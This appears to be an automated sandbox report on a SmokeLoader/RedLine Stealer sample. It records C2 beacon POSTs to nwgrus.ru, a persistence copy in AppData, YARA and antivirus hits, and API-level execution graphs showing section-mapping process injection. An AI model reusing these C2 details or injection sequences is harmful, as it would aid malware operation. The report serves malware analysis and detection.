                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 214
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:50.969698906 CEST214OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 50 dd f8
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu9PTgU\?SzU!a{=I%e(g_W% ,(eH3l%w0CWxX\8)5
                                      Oct 13, 2024 18:30:52.041395903 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      54192.168.2.465288190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:30:56.479343891 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qkfisicqugofkqpv.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 139
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:30:56.479343891 CEST139OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 1c a3 98
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vup[NMlqS6dn+) GD}twKO9x
                                      Oct 13, 2024 18:30:57.539180040 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:30:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      55192.168.2.465289190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:31:03.440818071 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://abelcascgtcbciky.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 229
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:31:03.440851927 CEST229OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 3a cb fa
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuW:g'k^72T4*n-^;^"'pO!CzJ&4IF';E@tX9VO!z1|`Cf
                                      Oct 13, 2024 18:31:04.500907898 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:31:04 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      56192.168.2.465290190.156.239.49802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:31:09.036417961 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://pcjiyoflornot.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 339
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:31:09.036448956 CEST339OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 0b d7 85
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuNX^W92|Q%$"#C^M"@][YA$E(!WK.kl--/ 'njsY) @
                                      Oct 13, 2024 18:31:10.096421957 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:31:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:12:27:06
                                      Start date:13/10/2024
                                      Path:C:\Users\user\Desktop\K80v6DHFHE.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\K80v6DHFHE.exe"
                                      Imagebase:0x400000
                                      File size:294'400 bytes
                                      MD5 hash:278DF1E655D9D27B659468EA21758D17
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:12:27:19
                                      Start date:13/10/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff72b770000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:5
                                      Start time:12:27:41
                                      Start date:13/10/2024
                                      Path:C:\Users\user\AppData\Roaming\wafguag
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\wafguag
                                      Imagebase:0x400000
                                      File size:294'400 bytes
                                      MD5 hash:278DF1E655D9D27B659468EA21758D17
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 39%, ReversingLabs
                                      • Detection: 41%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:12:30:01
                                      Start date:13/10/2024
                                      Path:C:\Users\user\AppData\Roaming\wafguag
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\wafguag
                                      Imagebase:0x400000
                                      File size:294'400 bytes
                                      MD5 hash:278DF1E655D9D27B659468EA21758D17
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.6%
                                        Dynamic/Decrypted Code Coverage:28.5%
                                        Signature Coverage:41.9%
                                        Total number of Nodes:172
                                        Total number of Limit Nodes:6
                                        execution_graph 3408 402e40 3410 402e37 3408->3410 3411 402edf 3410->3411 3412 4018e6 3410->3412 3413 4018f5 3412->3413 3414 40192e Sleep 3413->3414 3415 401949 3414->3415 3417 40195a 3415->3417 3418 401514 3415->3418 3417->3411 3420 401524 3418->3420 3419 4016e0 3419->3417 3420->3419 3421 4015c4 NtDuplicateObject 3420->3421 3421->3419 3422 4015e1 NtCreateSection 3421->3422 3423 401661 NtCreateSection 3422->3423 3424 401607 NtMapViewOfSection 3422->3424 3423->3419 3425 40168d 3423->3425 3424->3423 3426 40162a NtMapViewOfSection 3424->3426 3425->3419 3427 401697 NtMapViewOfSection 3425->3427 3426->3423 3428 401648 3426->3428 3427->3419 3429 4016be NtMapViewOfSection 3427->3429 3428->3423 3429->3419 3430 415960 3433 415530 3430->3433 3432 415965 3434 41553d 3433->3434 3435 415732 3434->3435 3436 4155f7 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3434->3436 3437 415740 SetCommState 3435->3437 3441 415759 3435->3441 3438 41565d 7 API calls 3436->3438 3437->3435 3439 415713 3438->3439 3440 41570a GetBoundsRect 3438->3440 3442 415723 3439->3442 3443 41571c PulseEvent 3439->3443 3440->3439 3444 415843 3441->3444 3445 415766 9 API calls 3441->3445 3442->3435 3443->3442 3456 415180 LocalAlloc 3444->3456 3452 415817 3445->3452 3449 41589d 3458 4154a0 3449->3458 3450 415848 LoadLibraryA 3457 4151b0 GetModuleHandleW GetProcAddress VirtualProtect 3450->3457 3452->3444 3453 4158a2 3454 4158d9 InterlockedDecrement 3453->3454 3455 4158ef 3453->3455 3454->3453 3455->3432 3456->3450 3457->3449 3459 4154c9 QueryDosDeviceA 3458->3459 3460 4154da 3458->3460 3459->3460 3469 415340 3460->3469 3463 4154f5 3472 415380 3463->3472 3464 4154ed FreeEnvironmentStringsA 3464->3463 3467 41551c 3467->3453 3468 41550c HeapDestroy GetNumaHighestNodeNumber 3468->3467 3470 415351 FatalAppExitA GetModuleHandleW 3469->3470 3471 415363 3469->3471 3470->3471 3471->3463 3471->3464 3473 41538d 3472->3473 3474 4153b9 3473->3474 3475 4153a8 BuildCommDCBA 3473->3475 3476 4153e3 3474->3476 3477 4153c1 WritePrivateProfileStringA FreeEnvironmentStringsA 3474->3477 3475->3476 3479 415419 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3476->3479 3480 41546a 3476->3480 3481 415370 3476->3481 3477->3476 3479->3476 3480->3467 3480->3468 3484 415300 3481->3484 3485 415329 3484->3485 3486 41531c SetEvent 3484->3486 3485->3476 3486->3485 3569 2c70005 3574 2c7092b GetPEB 3569->3574 3571 2c70030 3576 2c7003c 3571->3576 3575 2c70972 3574->3575 3575->3571 3577 2c70049 3576->3577 3578 2c70e0f 2 API calls 3577->3578 3579 2c70223 3578->3579 3580 2c70d90 GetPEB 3579->3580 3581 2c70238 VirtualAlloc 3580->3581 3582 2c70265 3581->3582 3583 2c702ce VirtualProtect 3582->3583 3585 2c7030b 3583->3585 3584 2c70439 VirtualFree 3588 2c704be LoadLibraryA 3584->3588 3585->3584 3587 2c708c7 3588->3587 3595 401542 3596 40153b 3595->3596 3597 4015c4 NtDuplicateObject 3596->3597 3604 4016e0 3596->3604 3598 4015e1 NtCreateSection 3597->3598 3597->3604 3599 401661 NtCreateSection 3598->3599 3600 401607 NtMapViewOfSection 3598->3600 3601 40168d 3599->3601 3599->3604 3600->3599 3602 40162a NtMapViewOfSection 3600->3602 3603 401697 NtMapViewOfSection 3601->3603 3601->3604 3602->3599 3606 401648 3602->3606 3603->3604 3605 4016be NtMapViewOfSection 3603->3605 3605->3604 3606->3599 3528 415867 3529 415870 LoadLibraryA 3528->3529 3537 4151b0 GetModuleHandleW GetProcAddress VirtualProtect 3529->3537 3532 41589d 3533 4154a0 15 API calls 3532->3533 3534 4158a2 3533->3534 3535 4158d9 InterlockedDecrement 3534->3535 3536 4158ef 3534->3536 3535->3534 3537->3532 3589 2c70001 3590 2c70005 3589->3590 3591 2c7092b GetPEB 3590->3591 3592 2c70030 3591->3592 3593 2c7003c 7 API calls 3592->3593 3594 2c70038 3593->3594 3510 2b7f9bc 3513 2b7f9cd 3510->3513 3514 2b7f9dc 3513->3514 3517 2b8016d 3514->3517 3518 2b80188 3517->3518 3519 2b80191 CreateToolhelp32Snapshot 3518->3519 3520 2b801ad Module32First 3518->3520 3519->3518 3519->3520 3521 2b801bc 3520->3521 3522 2b7f9cc 3520->3522 3524 2b7fe2c 3521->3524 3525 2b7fe57 3524->3525 3526 2b7fea0 3525->3526 3527 2b7fe68 VirtualAlloc 3525->3527 3526->3526 3527->3526 3654 402dd0 3656 402ddc 3654->3656 3655 402edf 3656->3655 3657 4018e6 8 API calls 3656->3657 3657->3655 3550 4018f1 3551 4018f6 3550->3551 3552 40192e Sleep 3551->3552 3553 401949 3552->3553 3554 401514 7 API calls 3553->3554 3555 40195a 3553->3555 3554->3555 3641 401915 3642 4018c6 3641->3642 3643 40191a 3641->3643 3644 40192e Sleep 3643->3644 3645 401949 3644->3645 3646 401514 7 API calls 3645->3646 3647 40195a 3645->3647 3646->3647 3487 402f97 3488 4030ee 3487->3488 3489 402fc1 3487->3489 3489->3488 3490 40307c RtlCreateUserThread NtTerminateProcess 3489->3490 3490->3488 3491 2c7003c 3492 2c70049 3491->3492 3504 2c70e0f SetErrorMode SetErrorMode 3492->3504 3497 2c70265 3498 2c702ce VirtualProtect 3497->3498 3500 2c7030b 3498->3500 3499 2c70439 VirtualFree 3503 2c704be LoadLibraryA 3499->3503 3500->3499 3502 2c708c7 3503->3502 3505 2c70223 3504->3505 3506 2c70d90 3505->3506 3507 2c70dad 3506->3507 3508 2c70dbb GetPEB 3507->3508 3509 2c70238 VirtualAlloc 3507->3509 3508->3509 3509->3497 3631 402d7b 3632 402d38 3631->3632 3632->3631 3633 4018e6 8 API calls 3632->3633 3634 402dc7 3632->3634 3633->3634 3556 4014fe 3557 401506 3556->3557 3558 401531 3556->3558 3559 4015c4 NtDuplicateObject 3558->3559 3566 4016e0 3558->3566 3560 4015e1 NtCreateSection 3559->3560 3559->3566 3561 401661 NtCreateSection 3560->3561 3562 401607 NtMapViewOfSection 3560->3562 3563 40168d 3561->3563 3561->3566 3562->3561 3564 40162a NtMapViewOfSection 3562->3564 3565 401697 NtMapViewOfSection 3563->3565 3563->3566 3564->3561 3568 401648 3564->3568 3565->3566 3567 4016be NtMapViewOfSection 3565->3567 3567->3566 3568->3561

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 415530-415558 2 415560-415567 0->2 3 415569-41556b 2->3 4 41556f-415575 2->4 3->4 5 415577-415581 4->5 6 415586-415590 4->6 5->6 7 415592-41559e 6->7 8 4155a8-4155af 6->8 7->8 8->2 9 4155b1-4155b9 8->9 11 4155c0-4155c6 9->11 12 4155d4-4155db 11->12 13 4155c8-4155ce 11->13 14 4155e1-4155e8 12->14 15 4155dd 12->15 13->12 14->11 16 4155ea-4155f1 14->16 15->14 17 415732-41573e 16->17 18 4155f7-415708 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415740-41574e SetCommState 17->19 22 415713-41571a 18->22 23 41570a-41570d GetBoundsRect 18->23 24 415750-415757 19->24 25 415759-415760 19->25 26 415723-41572f 22->26 27 41571c-41571d PulseEvent 22->27 23->22 24->19 24->25 28 415843-415852 call 415180 25->28 29 415766-41583d GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesW GetConsoleAliasExesLengthA GetBinaryType GetLocaleInfoW FormatMessageA 25->29 26->17 27->26 34 415854-415865 28->34 35 41588d-415898 LoadLibraryA call 4151b0 28->35 29->28 38 415870-415880 34->38 40 41589d-4158ae call 4154a0 35->40 41 415882 38->41 42 415888-41588b 38->42 46 4158b0-4158b7 40->46 41->42 42->35 42->38 48 4158c3-4158c9 46->48 49 4158b9-4158bf 46->49 50 4158d0-4158d7 48->50 51 4158cb call 4151a0 48->51 49->48 55 4158e6-4158ed 50->55 56 4158d9-4158e0 InterlockedDecrement 50->56 51->50 55->46 58 4158ef-4158ff 55->58 56->55 59 415900-415910 58->59 60 415912 59->60 61 415919-41591c 59->61 60->61 61->59 62 41591e-415929 61->62 63 415930-415935 62->63 64 415937-41593d 63->64 65 41593f-415945 63->65 64->65 66 415947-415954 64->66 65->63 65->66
                                        APIs
                                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415602
                                        • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041561B
                                        • FindAtomW.KERNEL32(00000000), ref: 00415622
                                        • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041562A
                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415642
                                        • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415669
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00415671
                                        • GetVersionExW.KERNEL32(?), ref: 0041567E
                                        • DisconnectNamedPipe.KERNEL32(?), ref: 00415691
                                        • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004156D6
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004156E5
                                        • LCMapStringA.KERNEL32(00000000,00000000,004173A8,00000000,?,00000000), ref: 004156FB
                                        • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041570D
                                        • PulseEvent.KERNEL32(00000000), ref: 0041571D
                                        • SetCommState.KERNELBASE(00000000,00000000), ref: 00415744
                                        • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415775
                                        • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415786
                                        • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041578E
                                        • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173D8,?,00000000), ref: 004157CE
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004157D5
                                        • GetConsoleAliasExesLengthA.KERNEL32 ref: 004157DB
                                        • GetBinaryType.KERNEL32(004173E8,?), ref: 004157ED
                                        • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004157F7
                                        • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041580A
                                        • LoadLibraryA.KERNELBASE(004173F4), ref: 00415892
                                        • InterlockedDecrement.KERNEL32(?), ref: 004158E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930240795.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40b000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Console$CommFile$FormatInterlockedLengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDecrementDefaultDisconnectEventExchangeExesFindInfoLibraryLoadLocaleMessageModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
                                        • String ID: k`$}$
                                        • API String ID: 777263412-956986773
                                        • Opcode ID: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
                                        • Instruction ID: 28d08a9e12edc1d56af3eee545ba5f80b0898f125747bb2d66328808cc3604cb
                                        • Opcode Fuzzy Hash: 9a6d517027ea327947a6227254bff5a0b99b091f86ca634d153418c31ef3e2ee
                                        • Instruction Fuzzy Hash: A4B1D071802924EBD721EB61EC48ADB7F79FF89351F41406AF50AA7150DB384A81CFAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 174 4018a5-4018b7 168->174 172 401595-4015be 169->172 173 401896 169->173 172->173 183 4015c4-4015db NtDuplicateObject 172->183 173->174 179 4018c5 174->179 180 4018bc-4018e3 call 401193 174->180 179->180 183->173 185 4015e1-401605 NtCreateSection 183->185 187 401661-401687 NtCreateSection 185->187 188 401607-401628 NtMapViewOfSection 185->188 187->173 189 40168d-401691 187->189 188->187 191 40162a-401646 NtMapViewOfSection 188->191 189->173 192 401697-4016b8 NtMapViewOfSection 189->192 191->187 194 401648-40165e 191->194 192->173 195 4016be-4016da NtMapViewOfSection 192->195 194->187 195->173 198 4016e0 call 4016e5 195->198
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 221 4018a5-4018b7 215->221 219 401595-4015be 216->219 220 401896 216->220 219->220 230 4015c4-4015db NtDuplicateObject 219->230 220->221 226 4018c5 221->226 227 4018bc-4018e3 call 401193 221->227 226->227 230->220 232 4015e1-401605 NtCreateSection 230->232 234 401661-401687 NtCreateSection 232->234 235 401607-401628 NtMapViewOfSection 232->235 234->220 236 40168d-401691 234->236 235->234 238 40162a-401646 NtMapViewOfSection 235->238 236->220 239 401697-4016b8 NtMapViewOfSection 236->239 238->234 241 401648-40165e 238->241 239->220 242 4016be-4016da NtMapViewOfSection 239->242 241->234 242->220 245 4016e0 call 4016e5 242->245
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 265 4018a5-4018b7 259->265 263 401595-4015be 260->263 264 401896 260->264 263->264 274 4015c4-4015db NtDuplicateObject 263->274 264->265 270 4018c5 265->270 271 4018bc-4018e3 call 401193 265->271 270->271 274->264 276 4015e1-401605 NtCreateSection 274->276 278 401661-401687 NtCreateSection 276->278 279 401607-401628 NtMapViewOfSection 276->279 278->264 280 40168d-401691 278->280 279->278 282 40162a-401646 NtMapViewOfSection 279->282 280->264 283 401697-4016b8 NtMapViewOfSection 280->283 282->278 285 401648-40165e 282->285 283->264 286 4016be-4016da NtMapViewOfSection 283->286 285->278 286->264 289 4016e0 call 4016e5 286->289
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1930067416.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_K80v6DHFHE.jbxd
                                        Similarity
                                        • API ID: Section$View$Create$DuplicateObject
                                        • String ID:
                                        • API String ID: 1546783058-0
                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
